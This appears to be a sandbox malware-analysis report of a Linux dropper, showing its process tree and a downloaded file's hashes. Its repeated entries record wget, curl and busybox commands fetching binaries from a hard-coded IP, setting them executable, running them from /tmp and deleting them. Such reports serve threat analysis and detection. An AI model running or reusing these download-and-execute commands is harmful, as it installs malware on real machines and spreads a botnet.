/bin/rmrm uX9sIze9RdxkijyvHBaiaeoAQ4zAKcS2Cm2⤵PID:1630
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/Y0ZXt4mblX1kfaAX0V7DCL0tY6lmNmygxK2⤵PID:1631
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/Y0ZXt4mblX1kfaAX0V7DCL0tY6lmNmygxK2⤵
- Writes file to tmp directory
PID:1632
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/Y0ZXt4mblX1kfaAX0V7DCL0tY6lmNmygxK2⤵PID:1633
-
-
/bin/chmodchmod 777 Y0ZXt4mblX1kfaAX0V7DCL0tY6lmNmygxK2⤵
- File and Directory Permissions Modification
PID:1634
-
-
/tmp/Y0ZXt4mblX1kfaAX0V7DCL0tY6lmNmygxK./Y0ZXt4mblX1kfaAX0V7DCL0tY6lmNmygxK2⤵
- Executes dropped EXE
PID:1635
-
-
/bin/rmrm Y0ZXt4mblX1kfaAX0V7DCL0tY6lmNmygxK2⤵PID:1636
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/8QbZDuGMN0Pmhda9Jc1U7MqRRrtpaoRwP82⤵PID:1637
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/8QbZDuGMN0Pmhda9Jc1U7MqRRrtpaoRwP82⤵
- Writes file to tmp directory
PID:1638
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/8QbZDuGMN0Pmhda9Jc1U7MqRRrtpaoRwP82⤵PID:1639
-
-
/bin/chmodchmod 777 8QbZDuGMN0Pmhda9Jc1U7MqRRrtpaoRwP82⤵
- File and Directory Permissions Modification
PID:1640
-
-
/tmp/8QbZDuGMN0Pmhda9Jc1U7MqRRrtpaoRwP8./8QbZDuGMN0Pmhda9Jc1U7MqRRrtpaoRwP82⤵
- Executes dropped EXE
PID:1641
-
-
/bin/rmrm 8QbZDuGMN0Pmhda9Jc1U7MqRRrtpaoRwP82⤵PID:1642
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/zNY2yNjdAmMqTNdTvLgiU2uOxdlRbbOsDE2⤵PID:1643
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/zNY2yNjdAmMqTNdTvLgiU2uOxdlRbbOsDE2⤵
- Writes file to tmp directory
PID:1644
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/zNY2yNjdAmMqTNdTvLgiU2uOxdlRbbOsDE2⤵PID:1645
-
-
/bin/chmodchmod 777 zNY2yNjdAmMqTNdTvLgiU2uOxdlRbbOsDE2⤵
- File and Directory Permissions Modification
PID:1646
-
-
/tmp/zNY2yNjdAmMqTNdTvLgiU2uOxdlRbbOsDE./zNY2yNjdAmMqTNdTvLgiU2uOxdlRbbOsDE2⤵
- Executes dropped EXE
PID:1647
-
-
/bin/rmrm zNY2yNjdAmMqTNdTvLgiU2uOxdlRbbOsDE2⤵PID:1648
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/5QahJXzrUnujyP1ksHcSV4ekNdBHqPRmxp2⤵PID:1649
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/5QahJXzrUnujyP1ksHcSV4ekNdBHqPRmxp2⤵
- Writes file to tmp directory
PID:1650
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/5QahJXzrUnujyP1ksHcSV4ekNdBHqPRmxp2⤵PID:1651
-
-
/bin/chmodchmod 777 5QahJXzrUnujyP1ksHcSV4ekNdBHqPRmxp2⤵
- File and Directory Permissions Modification
PID:1652
-
-
/tmp/5QahJXzrUnujyP1ksHcSV4ekNdBHqPRmxp./5QahJXzrUnujyP1ksHcSV4ekNdBHqPRmxp2⤵
- Executes dropped EXE
PID:1653
-
-
/bin/rmrm 5QahJXzrUnujyP1ksHcSV4ekNdBHqPRmxp2⤵PID:1654
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/kwmk7TZ5XaauHSZZWkYwtfpIf8Mvz5o6XJ2⤵PID:1655
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/kwmk7TZ5XaauHSZZWkYwtfpIf8Mvz5o6XJ2⤵
- Writes file to tmp directory
PID:1656
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/kwmk7TZ5XaauHSZZWkYwtfpIf8Mvz5o6XJ2⤵PID:1657
-
-
/bin/chmodchmod 777 kwmk7TZ5XaauHSZZWkYwtfpIf8Mvz5o6XJ2⤵
- File and Directory Permissions Modification
PID:1660
-
-
/tmp/kwmk7TZ5XaauHSZZWkYwtfpIf8Mvz5o6XJ./kwmk7TZ5XaauHSZZWkYwtfpIf8Mvz5o6XJ2⤵
- Executes dropped EXE
PID:1661
-
-
/bin/rmrm kwmk7TZ5XaauHSZZWkYwtfpIf8Mvz5o6XJ2⤵PID:1662
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/pooPG8wQROD6wksRWAfxchOtNyCZDfqXH72⤵PID:1663
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/pooPG8wQROD6wksRWAfxchOtNyCZDfqXH72⤵
- Writes file to tmp directory
PID:1664
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/pooPG8wQROD6wksRWAfxchOtNyCZDfqXH72⤵PID:1665
-
-
/bin/chmodchmod 777 pooPG8wQROD6wksRWAfxchOtNyCZDfqXH72⤵
- File and Directory Permissions Modification
PID:1666
-
-
/tmp/pooPG8wQROD6wksRWAfxchOtNyCZDfqXH7./pooPG8wQROD6wksRWAfxchOtNyCZDfqXH72⤵
- Executes dropped EXE
PID:1667
-
-
/bin/rmrm pooPG8wQROD6wksRWAfxchOtNyCZDfqXH72⤵PID:1668
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/O2rajdeuY74yEUSjO72Rf0z0jaal7B7SsA2⤵PID:1669
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/O2rajdeuY74yEUSjO72Rf0z0jaal7B7SsA2⤵
- Writes file to tmp directory
PID:1670
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/O2rajdeuY74yEUSjO72Rf0z0jaal7B7SsA2⤵PID:1671
-
-
/bin/chmodchmod 777 O2rajdeuY74yEUSjO72Rf0z0jaal7B7SsA2⤵
- File and Directory Permissions Modification
PID:1672
-
-
/tmp/O2rajdeuY74yEUSjO72Rf0z0jaal7B7SsA./O2rajdeuY74yEUSjO72Rf0z0jaal7B7SsA2⤵
- Executes dropped EXE
PID:1673
-
-
/bin/rmrm O2rajdeuY74yEUSjO72Rf0z0jaal7B7SsA2⤵PID:1674
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/YBdSnAgfCGY9UHqbtwa0d3XTjzkPVDfLof2⤵PID:1675
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/YBdSnAgfCGY9UHqbtwa0d3XTjzkPVDfLof2⤵
- Writes file to tmp directory
PID:1676
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/YBdSnAgfCGY9UHqbtwa0d3XTjzkPVDfLof2⤵PID:1677
-
-
/bin/chmodchmod 777 YBdSnAgfCGY9UHqbtwa0d3XTjzkPVDfLof2⤵
- File and Directory Permissions Modification
PID:1678
-
-
/tmp/YBdSnAgfCGY9UHqbtwa0d3XTjzkPVDfLof./YBdSnAgfCGY9UHqbtwa0d3XTjzkPVDfLof2⤵
- Executes dropped EXE
PID:1679
-
-
/bin/rmrm YBdSnAgfCGY9UHqbtwa0d3XTjzkPVDfLof2⤵PID:1680
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97